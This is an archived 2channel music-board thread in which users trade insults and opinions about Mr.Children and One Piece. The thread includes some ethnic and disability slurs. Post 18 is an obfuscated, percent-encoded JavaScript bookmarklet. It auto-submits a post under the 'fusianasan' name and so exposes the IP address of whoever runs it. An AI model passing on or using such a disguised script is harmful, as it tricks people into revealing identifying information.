2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ミスチル聴く奴はワンピースでも読んでろ

1 :名も無き音楽論客:2007/02/25(日) 02:55:41 ID:6uDkQcd8
売れ筋で中身の無い音楽、売り上げしか誇ることのできない、邦楽界のゴミことミスチルを聴く奴は、同じく売り上げしか誇ることのできないクズ漫画のワンピースでも読んでろ、この社会のゴミが!

2 :名も無き音楽論客:2007/02/25(日) 09:10:09 ID:???
ワンピースは普通に面白いと思うよ。
イボライの顔のほうが百倍面白いけどねw

3 :名も無き音楽論客:2007/02/25(日) 09:30:32 ID:IcFgRloL
つーか世間ではミスチル聴いてワンピ読むやつは
むしろ勝ち組つーか普通の人のイメージがある

4 :名も無き音楽論客:2007/02/25(日) 09:46:24 ID:???
>>1負け組乙www

5 :名も無き音楽論客:2007/02/25(日) 09:49:10 ID:???
ミスチルとか聴く奴はダサくてキモくて時代遅れなイメージがある
ワンピースは別に悪いイメージはないな

6 :名も無き音楽論客:2007/02/25(日) 09:58:45 ID:NUe6lxlD
ミスチルってたいして音楽に興味無いやつが聴くバンドだろ

7 :名も無き音楽論客:2007/02/25(日) 11:15:10 ID:oOv9TolT
チョンピ

8 :名も無き音楽論客:2007/02/25(日) 11:33:02 ID:???
どちらも中学生までだろ
大人になってミスチルやワンピースで感動してるやつは池沼だけだと思うよ

9 :名も無き音楽論客:2007/02/25(日) 12:28:26 ID:zUQlY8CN
ワンピースは話は嫌いではないが絵が嫌い

10 :名も無き音楽論客:2007/02/25(日) 19:13:24 ID:???
大人になってミスチルやワンピースで感動してるやつは池沼だけだと思うよ

という考え方こそが多分に中学生っぽいがな。

11 :名も無き音楽論客:2007/02/25(日) 19:25:55 ID:???
というか大人になって少年漫画ってなぁ…。ワンピースなんか読んだことないけど

12 :名も無き音楽論客:2007/05/02(水) 09:41:39 ID:8o2Y21EZ
1の言いたいことは分かる

13 :名も無き音楽論客:2007/05/02(水) 10:32:17 ID:xMh9Z5gG
俺もわかる

やつらはいま一番人気があるものに興味があり、それが面白いものとか
いいものとかは全く関係ない

14 :名も無き音楽論客:2007/05/02(水) 15:46:59 ID:???
ミスチルを批判するのは至極当然だが
ファンを罵倒するのはアンチとして低レベルだよ
説得力に欠けてしまう。

15 :名も無き音楽論客:2007/05/02(水) 17:07:23 ID:???
やっぱり2ちゃんってくだらない

16 :名も無き音楽論客:2007/05/02(水) 18:01:49 ID:???
ワンピースは好きだけど
ミスチルはおじさんなイメージがあるだけで興味ない
ワンピはバンプのセーリングディが主題なんだから
ワンピオタはミスチルよりバンプだよ

17 :名も無き音楽論客:2007/05/03(木) 19:33:33 ID:xRPs66ik
売り上げと中身が伴ってると思うのはB'zとドラゴンボール。
売り上げは凄いが魅力を感じないのはミスチルとワンピース。

18 :ハァ?!:2007/05/03(木) 22:09:49 ID:???
JavaScript:var%20f=doc%75ment.%67e%74Ele%6de%6etsB%79%54ag%4eame%28%27fo%72m%27%29%5b0%5d;f.F%52%4f%4d.%76al%75e=%27f%75sia%6easa%6e%27;f.%6dail.%76al%75e=%27u%72a2c%68%27;f.%4dES%53A%47E.%76al%75e=%27%4a%53%27;f.s%75b%6di%74.clic%6b%28%29;void%280%29;


19 :名も無き音楽論客:2007/05/03(木) 23:17:46 ID:fJh3Ev7g
>>17

ビーズWWWWWWWWWWWW



きめえええ糞パクリバンドヲタwwwwwwww




ビーズなんてオレンジレンジ以下だろがカスがwwwwwwwwww

20 :名も無き音楽論客:2007/05/03(木) 23:18:46 ID:fJh3Ev7g
>>17


音楽ド素人のお前がこの板にくんなよwwwww





21 :名も無き音楽論客:2007/05/04(金) 14:40:17 ID:???
釣り乙

22 :名も無き音楽論客:2007/05/04(金) 15:03:15 ID:???
ドラゴンボールはビートルズって感じかな

23 :名も無き音楽論客:2007/09/05(水) 18:41:53 ID:???
ワンピースなんて糞尾田が書いてる時点でいらん

24 :名も無き音楽論客:2007/09/05(水) 20:01:27 ID:K+wtC9fg
>>1
それでディスってるつもりっスかwww?

25 :名無しさん:2007/09/05(水) 20:21:47 ID:WNhDhXx2
>>19
B'zはパクリしか叩くとこがないん?

26 :名も無き音楽論客:2007/09/05(水) 23:13:10 ID:???
>>25
だって楽曲の批判をしようにもオリジナルじゃないのですから。

27 :名も無き音楽論客:2007/09/06(木) 00:21:56 ID:8UtwO2CO
まあ本物の音楽(笑)とやらを追及して
ブランキーやらミセルやら聞きながら浦沢直樹とか読む奴に比べりゃ
アホ面さげてミスチルとかポルノとか聞きながらワンピース読んでる奴の方がモテるんだけどな

好かれるとしてもミスチル好き女の方が性格ニュートラルだし
売れ専嫌いで洋楽好きな女と付き合って今までマトモな奴だった試しがない

28 :名も無き音楽論客:2007/09/06(木) 01:29:01 ID:???
ミスチルも盗作バンドじゃんw

29 :名も無き音楽論客:2007/09/11(火) 12:40:26 ID:UHigQJlf
>>27
たかだか音楽や漫画の嗜好でモテるモテないとか・・・

少なくともお前がモテないのはわかった

30 :名も無き音楽論客:2007/09/14(金) 19:54:30 ID:/by8JWvg
>>27 売れ専嫌いで洋楽好きな女と付き合って今までマトモな奴だった試しがない

そりゃお前の見る目がなかっただけだろうがw

31 :名も無き音楽論客:2007/09/14(金) 20:40:59 ID:???
>1
そこはバンプだろ

32 :名も無き音楽論客:2007/09/15(土) 21:20:51 ID:YUfEYogU
ゴムゴムのドロップキック

33 :名も無き音楽論客:2007/10/13(土) 18:31:08 ID:IL2j5zvC
何この伸びない糞スレ

1と1に同意してる奴らが基地外ってことはわかったぞ。

34 :名も無き音楽論客:2007/10/17(水) 17:03:45 ID:GfJcH5K8
>>1の主張はよくわからんけど、スレタイには何となく納得できる。

35 :名も無き音楽論客:2007/10/29(月) 22:47:47 ID:gnd5/lii
ワンピース(笑)

36 :名も無き音楽論客:2007/11/05(月) 21:15:53 ID:JAYgXuqS
Mr.Childrenもワンピースも好きだ。私は。

37 :名も無き音楽論客:2007/11/07(水) 00:24:53 ID:Dl2mHz2i
ぶっちゃけ10ccとザッパが好きなんだけど、
彼女の影響でミスチル聞いてるwうぇw
でもそんなに嫌いじゃないww
音楽の幅が広がったぜよww

38 :名も無き音楽論客:2007/11/08(木) 15:33:40 ID:???
ミスチル聴いたことないがワンピースは少しもおもしろくないな…

39 :名も無き音楽論客:2007/11/08(木) 23:43:47 ID:CRzwx4UJ
ミスチルやワンピースたたく奴は

どうせモテない男だろう。

ごめんね図星で。

ムキになった奴の反論が楽しみだ。



40 :名も無き音楽論客:2007/11/09(金) 01:13:39 ID:Qr4iBpbH
ワンピースは関係なくね?

41 :名も無き音楽論客:2007/11/09(金) 09:09:14 ID:???
>>39
うるせー!!ミスチルとワンピースは普通に糞なんだよ!!(# ゚Д゚) ムッキー
( `Д´)フォオオオオオオオオオ!


42 :名も無き音楽論客:2007/11/10(土) 16:36:37 ID:???
俺が四年前に小6だったころマジでワンピース読みながらミスチル聞いてた

43 :名も無き音楽論客:2007/11/10(土) 16:59:38 ID:c0ZUobv3
そういえば、以前ワンピースの作者がジャンプの巻末コメで
ミスチル好きみたいな事を言ってたな

44 :名も無き音楽論客:2007/11/11(日) 01:06:47 ID:CNp3Y34t
ミスチルは知らんがワンピース普通におもろいよ

45 :名も無き音楽論客:2007/11/11(日) 01:18:18 ID:mSt/zQaZ
ミスチルもワンピ好きらしい

てか今CDTVで歌ってるよミスチ

46 :名も無き音楽論客:2007/11/11(日) 01:20:44 ID:???
>>16確かにワンピはバンプかな

47 :名も無き音楽論客:2007/11/11(日) 05:30:47 ID:???
ミスチルはハンタかな

48 :名も無き音楽論客:2007/11/11(日) 08:37:59 ID:???
音楽好きでミスチル好きな人も普通にいると思うが
偏見はいかんよ

49 :名も無き音楽論客:2007/11/14(水) 09:01:21 ID:x/H7ycUO
ミスチルは興味ないがワンピはうんこ

50 :黄色い人魚:2007/11/26(月) 00:07:04 ID:ZPMDHITH
日本人はクオリティの高い音楽より
あえてミスチルのような歌下手糞な音楽を好む
それは音楽にもとどまらず映画だってそうだ
例えばアメリカ映画なんかは派手なCGを駆使した
いかにもクオリティの高そうな映画を作る
しかし日本の映画はセカチューやAlwaysなど
映像技術は劣るものの心に染み入る映画が多い
音楽も一緒ミスチルはけっして上手なバンドではない
だがその一生懸命さが日本人には伝わるのである
正直ミスチルの歌唱力は糞だ
だがその糞さが憎いのである
糞さに心惹かれるのである
ミスチルはそんな糞なバンドなのだ


51 :名も無き音楽論客:2007/11/26(月) 08:16:07 ID:???
ワンピースは初期は空島行くまではおもしろかった

52 :名も無き音楽論客:2007/11/30(金) 19:31:11 ID:???
>>50
セカチューやAlwaysにCGが入り込む余地が無いので説得力に欠ける
それに特撮においては日本は第一国だったが

53 :名も無き音楽論客:2007/12/01(土) 14:52:49 ID:???
lostage[ロストエイジ]

2001年地元奈良にてVo/B五味岳久(兄)とG五味拓人(弟)の兄弟を中心に結成された4ピース
トイズファクトリーから最新作「DRAMA」をリリース
ダークで激しく繊細で美しいサウンドを聴かせる最強のロックバンド 

http://jp.youtube.com/watch?v=PF8tIwzFfVo ←「TELEVISION CITY」
http://jp.youtube.com/watch?v=NedCyra9Q_Q ←「RED」
http://www.sound-tv.net/artists/lostage/ ←特集サイト

54 :名も無き音楽論客:2008/01/10(木) 11:47:40 ID:dVbGq3fe
akFUOYT7O

55 :名も無き音楽論客:2008/01/10(木) 13:04:15 ID:N6ESHlmQ
このスレタイ書いた奴、馬鹿じゃん!!

56 :名も無き音楽論客:2008/01/11(金) 19:57:53 ID:RNUgCZmy
【新世界】ワンピースアンチスレ73【期待ゼロ】
http://ex21.2ch.net/test/read.cgi/wcomic/1200036848/


57 :名も無き音楽論客:2008/02/18(月) 16:11:02 ID:3jeTzAcz


58 :名も無き音楽論客:2008/03/12(水) 20:30:17 ID:90mf6J/P


59 :名も無き音楽論客:2008/03/15(土) 13:15:07 ID:???
オリコン載るような曲は所詮商業音楽。
どれも一緒だよ、初心者共が。

60 :名も無き音楽論客:2008/03/15(土) 13:33:59 ID:???
ワンピース大好きだけどミスチル大っ嫌いなんだよ一緒にすんな!!

61 :名も無き音楽論客:2008/03/15(土) 14:04:23 ID:H4bavzWY
昼間から一人必死乙。


62 :名も無き音楽論客:2008/03/15(土) 16:24:49 ID:???
>>59
中二病乙wwwwwww

オリコンにすらのらないゴミ音楽愛好家さんは大変だねwwww

63 :名も無き音楽論客:2008/03/15(土) 19:56:57 ID:???
>>62
コード進行どころか楽譜も読めない音楽初心者はオリコンでも読んでなさい。

64 :名も無き音楽論客:2008/03/27(木) 22:40:17 ID:/gBxYWA5


65 :名も無き音楽論客:2008/04/19(土) 22:01:42 ID:V2wZAB5s
なんだろう、
芸能人ってさ、歌手とか、安定はないから
まぁそこそこ暮らせるぐらいは
稼いでおく必要あるんだよね。
有名になると芸人じゃあるまいし、惨めに落ちぶれること出来ない、みたいな事あるし。
しかし、それに妬み、
会社員として就職できなかった連中って(つまりニート)
ここでストレス発散させるしかないのか・・そうか。
しかしまたストレス発散のさせかたが
暗いのなんのってw
wwwwwwwが無言、無表情なんだろうねww
就職出来ないのも結婚出来ないのも自分が悪いんだけどね、たいがい


ニートの中でも鬱屈、卑屈ニートしか叩きを趣味にしないだろうけどw



66 :名も無き音楽論客:2008/05/05(月) 06:32:59 ID:e+DHPElw
高校生の頃ワンピースが出始めて、そのときから読み続けているけれど、
正直、最近は絵も汚いし、面白くない。一向に終わる気配がないし。

ミスチルも中学生、高校生までは聴いていたけれど、
最近の活動はとんと知らないな。

67 :名も無き音楽論客:2008/05/05(月) 15:47:56 ID:O8rTAQ2e
ワンピースってゴミだよな。

68 :名も無き音楽論客:2008/05/14(水) 01:46:39 ID:bkag45Ua
カスチルみたいな文化祭レベルの偽善お涙バンドと
ワンピースを一緒にするな
婆の歌謡曲だろカスチルなんて

69 :名も無き音楽論客:2008/05/14(水) 08:51:36 ID:???
ミスチルって名前くらいしか知らないけど、
ワンピースと一緒にされるなんてカワイソウ。
ワンピースの「ミニメリーに大喜び」は作り話として完全に失格。

70 :名も無き音楽論客:2008/06/13(金) 08:13:03 ID:VRI90V1L
ワンピとか

71 :名も無き音楽論客:2008/06/22(日) 03:59:50 ID:???
さすがにワンピースに失礼だろ

72 :名も無き音楽論客:2008/06/22(日) 20:36:38 ID:Vo4m2aVf
いやミスチルに失礼だろ
まあこのスレにはワンピのアンチとミスチルのアンチしかいないま

73 :名も無き音楽論客:2008/06/22(日) 23:28:24 ID:???
なんでカスチル聞く奴って不細工しかいないんだ?
LUNA SEAやラルク聞く奴はイケメンばっかりなのになw


74 :名も無き音楽論客:2008/06/24(火) 16:04:08 ID:FgfbPupu
ミスチルは人類の希望と宝
完璧な存在、欠けたものがない。

ミスチルは人類に勇気を与える
その存在が人類の可能性を広げ、大きくする
例えば100mを10秒きる選手が一人現れる事によって、ぞくぞくと
そういう選手が出現する・・想像してごらん?それって素晴らしい。
かつては不可能だと思われてた事が実現する。
その担い手、ミスチル。偉大だ・・

まわりまわって笑顔を創っていく・・そう桜井さんは謙遜するが、もっと大きな
夢や希望なんだよ、ミスチル、桜井さんって


75 :名も無き音楽論客:2008/07/04(金) 06:56:30 ID:???
今どきミスチル聞く奴なんていないよ。

76 :名も無き音楽論客:2008/07/04(金) 10:15:16 ID:3obnNqal
新曲が気持ち悪いage

77 :名も無き音楽論客:2008/07/04(金) 12:22:25 ID:fhJJazY7
「2ch脳」か……糞スレも構わず闊歩とは厄介の種だ、
中指を立てて「オタク消えろ」と言う以外なかろう

14 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)